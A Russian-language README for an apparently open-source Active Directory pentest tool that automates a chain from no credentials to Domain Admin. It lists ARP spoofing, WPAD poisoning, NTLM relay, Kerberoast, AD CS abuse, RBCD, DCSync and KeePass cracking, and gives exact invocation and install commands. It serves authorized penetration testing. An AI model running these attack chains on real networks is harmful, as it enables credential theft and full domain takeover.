
Автоматизированная цепочка атак на Active Directory от нулевой аутентификации до Domain Admin. Объединяет 25+ техник, включая Kerberoast, AD CS ESC1-16, Shadow Credentials, RBCD, DCSync и эксплойты отражения Synacktiv 2026. Только для авторизованного пентеста.
Без аутентификации до Domain Admin — автоматизированная цепочка атак на Active Directory
Полностью автоматизированный инструмент для тестирования на проникновение, который объединяет более 25 техник атак для компрометации сред Active Directory. Разработан для авторизованных оценок безопасности.
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ Zero-Auth to Domain Admin — Attack Chain
Discover | Sniff | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH)--spray-password).library-ms / .theme / .url на доступных для записи ресурсахbloodhound-python -c All — сбор данных + анализ ZIPWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → апгрейд до ghost-SPN (CVE-2025-58726)AddKeyCredentialLink → shadow credentials → PKINIT → NT-хэшGenericAll / WriteAccountRestrictions на компьютере → цепочка RBCD → административный TGS-altservice за одну фазу-altservice$ при поиске субъекта → TGT для Linux-пользователя через автоматически создаваемую учётную запись машины <user>$ → GSSAPI SSHGet-CimInstance Win32_Process через nxc -x; regex-поиск паролей в mysql/sqlcmd/runas/KeePass/флагах в стиле --password*.kdbx в C:\Users, скачивание через smbclient, keepass2john | hashcat -m 13400# Fully automated — zero-cred chain (auto-discovers everything)
sudo ./ad-autopwn.py
# With credentials — full chain
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC labs (Layer 2 attacks blocked) — auto-discovery still works
sudo ./ad-autopwn.py --no-arp --no-wpad
# Pre-auth credential discovery (lockout-safe)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound graph collection + automatic high-value analysis
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# Dollar Ticket — TGT for 'root' via auto-created root$ machine acct
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD chain — full ghost-SPN + RBCD + altservice rewrite, one shot
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker bypass
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# Dry run (print every command, run nothing — even background processes)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1
apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
/opt/tools/)git clone https://github.com/mverschu/CVE-2025-33073 /opt/tools/CVE-2025-33073
git clone https://github.com/dirkjanm/krbrelayx /opt/tools/krbrelayx
git clone https://github.com/Wh04m1001/DFSCoerce /opt/tools/DFSCoerce
git clone https://github.com/ShutdownRepo/ShadowCoerce /opt/tools/ShadowCoerce
git clone https://github.com/ShutdownRepo/pywhisker /opt/tools/pywhisker
git clone https://github.com/dirkjanm/PKINITtools /opt/tools/PKINITtools
git clone https://github.com/csandker/pxethiefy /opt/tools/pxethiefy
git clone https://github.com/garrettfoster13/sccmhunter /opt/tools/sccmhunter
git clone https://github.com/dirkjanm/mitm6 /opt/tools/mitm6
git clone https://github.com/Hackndo/pyGPOAbuse /opt/tools/pyGPOAbuse
git clone https://github.com/Hackndo/WebclientServiceScanner /opt/tools/WebclientServiceScanner
git clone https://github.com/almandin/Certihound /opt/tools/Certihound
pipx install coercer
pipx install wsuks --system-site-packages
kerbrute — загрузите последний бинарник с
https://github.com/ropnop/kerbrute/releases — установите в /usr/local/bin/userenum-cldap — сопутствующий перечислитель CLDAP NetLogon-ping (находится в этом репозитории как userenum-cldap.py; установите в /usr/local/bin/userenum-cldap)asn1tools — pip install asn1tools (рантайм-зависимость для перечисления CLDAP)# APT packages
sudo apt install python3 impacket-scripts netexec nmap hashcat tcpdump \
responder dsniff arp-scan certipy-ad bloodyad bloodhound.py \
smbclient atftp wimtools john seclists
# All required repos
for repo in mverschu/CVE-2025-33073 dirkjanm/krbrelayx \
Wh04m1001/DFSCoerce ShutdownRepo/ShadowCoerce \
ShutdownRepo/pywhisker dirkjanm/PKINITtools \
csandker/pxethiefy garrettfoster13/sccmhunter \
dirkjanm/mitm6 Hackndo/pyGPOAbuse \
Hackndo/WebclientServiceScanner almandin/Certihound; do
sudo git clone "https://github.com/$repo" "/opt/tools/$(basename $repo)"
done
# Python deps for repos that need them
for repo in pywhisker PKINITtools sccmhunter pxethiefy mitm6 pyGPOAbuse Certihound; do
[ -f "/opt/tools/$repo/requirements.txt" ] && \
pip3 install --break-system-packages -r "/opt/tools/$repo/requirements.txt"
done
# Pipx packages
pipx install coercer
pipx install wsuks --system-site-packages
# kerbrute (ropnop) binary
sudo wget -q -O /usr/local/bin/kerbrute \
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
sudo chmod +x /usr/local/bin/kerbrute
# CLDAP userenum runtime dep
sudo pip3 install --break-system-packages asn1tools
# userenum-cldap companion script (this repo)
sudo wget -q -O /usr/local/bin/userenum-cldap \
https://raw.githubusercontent.com/jonaslejon/ad-autopwn/main/userenum-cldap.py
sudo chmod +x /usr/local/bin/userenum-cldap
# ad-autopwn itself
sudo cp ad-autopwn.py /usr/local/bin/ad-autopwn
sudo chmod +x /usr/local/bin/ad-autopwn
check_prerequisites() запускается в начале каждого вызова и выводит
зелёный ✅ / жёлтый ⚠️ статус для каждого инструмента, которого касается скрипт, с
подсказками по установке для всего недостающего.
eu-west-1 — полное покрытие фаз v4.10.0 проверено
от начала до конца. Автообнаружение на AWS теперь работает буквально
с одним --no-arp --no-wpad (всё остальное — интерфейс, IP атакующего,
домен, IP DC, FQDN DC — автоматически определяется через сканирование подсети + dig
с запасным вариантом на @<dc_ip>).stannis.baratheon → GenericAll → KINGSLANDING$: от одного
низкопривилегированного аккаунта до административного TGS на DC за 5 секунд.krbtgt, — создание золотого билета возможно.--dry-run выводит каждую команду (обычные и фоновые) без
выполнения — не запустит ARP-спуферы, mitm6, Responder или ntlmrelayx.try/finally с os.chdir,
чтобы восстановление попадало в нужный каталог при любом пути завершения.--no-cleanup сохраняет всё для криминалистического анализа.Только для авторизованного тестирования на проникновение и исследований в области безопасности.
Этот инструмент предназначен для использования специалистами по безопасности в ходе авторизованных работ. Несанкционированный доступ к компьютерным системам незаконен. Всегда получайте письменное разрешение перед началом тестирования.
Triop AB — https://triop.se
MIT
| Фаза | Аутентификация | Описание |
|---|
full | опционально | Полная автоматизированная цепочка (автоопределение с учётными данными или без) |
sniff | нет | Пассивное обнаружение L2-трафика |
discover | нет | kerbrute + CLDAP + AS-REP + pre2k + (опционально) спрей |
arp | нет | ARP-спуфинг + перехват NTLM |
wpad | нет | WPAD/LLMNR-отравление (mitm6 / Responder) |
wsus | нет | WSUS NTLM relay |
pxe | нет | Кража учётных данных PXE-загрузки |
enum | да | Перечисление целей (цели relay, неограниченная делегация, хосты WebClient) |
enrich | да | Батарея из 13 модулей nxc (LAPS, timeroast, MAQ, nopac, zerologon, …) + автоматический потребитель |
bloodhound | да | bloodhound-python -c All + анализ + цепочки авто-действий |
roast | да | Kerberoast + AS-REP Roast |
adcs | да | Эксплуатация AD CS (ESC1-ESC16) |
sccm | да | Кража учётных данных SCCM NAA |
exploit | да | Эксплуатация NTLM reflection / coercion на конкретной цели |
dcsync | да (DA) | Дамп хэшей домена |
loot | да | Сбор командной строки процессов + поиск/взлом KeePass |
tgs-rewrite | нет | Офлайн-переписывание sname в ccache (KCD bypass в стиле tgssub) |
dollar-ticket | да | Атака повтора KDC с суффиксом $ (цель Linux GSSAPI) |
rbcd-kcd | да | Полный оркестратор цепочки RBCD+KCD (WriteSPN → ghost → RBCD → S4U+altservice) |
reflect-tcpport | да | Примитив LPE CVE-2026-24294 (SMB-on-tcpport) |
reflect-loopback | да | Примитив LPE CVE-2026-26128 (Kerberos loopback через Unicode SPN) |
kerb-reflect | да | Отражение AP-REQ CVE-2025-58726 ghost-SPN |